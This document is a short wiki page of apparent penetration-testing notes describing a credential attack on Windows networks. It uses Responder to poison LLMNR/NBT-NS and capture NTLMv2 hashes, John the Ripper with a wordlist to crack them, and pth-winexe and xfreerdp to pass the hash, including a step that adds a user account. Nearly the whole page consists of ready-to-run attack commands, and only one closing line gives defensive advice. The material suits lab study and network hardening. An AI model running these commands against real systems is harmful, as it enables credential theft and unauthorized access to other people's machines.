cyberdocs:pass_the_hash_using_responder_and_john
RESPONDER

#cd /usr/share/responder/
#python Responder.py -i 192.168.1.50 -I eth0

Simulate a user typing the wrong SMB server name, using SNARE01 instead of SHARE01.
An error is returned to the client machine from Responder.py, saying that Windows cannot access it.

#cd logs/
#ls (to confirm that the hash log file was created)

JOHN

#john SMBv2-NTLMv2-SSP-192.168.1.8.txt
#john hash2.txt --wordlist=/root/Desktop/rockyou.txt
#john --show hash2.txt
#cat john.pot
#john hh.txt --wordlist=/root/Desktop/rockyou.txt
#john hh.txt --show
#cd ~/.john (same as: cd ~ followed by cd .john)

PASS the HASH

#cd pth-toolkit-master/
#./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd
#./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 'net user a a /add'
#pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd
#xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8

*How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks*

The good news is that this attack is fairly easy to prevent. Note that both LLMNR and NetBIOS Name Service need to be disabled: if you only disable LLMNR, Windows will fail over to NetBIOS Name Service for resolution.
cyberdocs/pass_the_hash_using_responder_and_john.txt · Last modified: 2019/02/06 13:03 by dardan
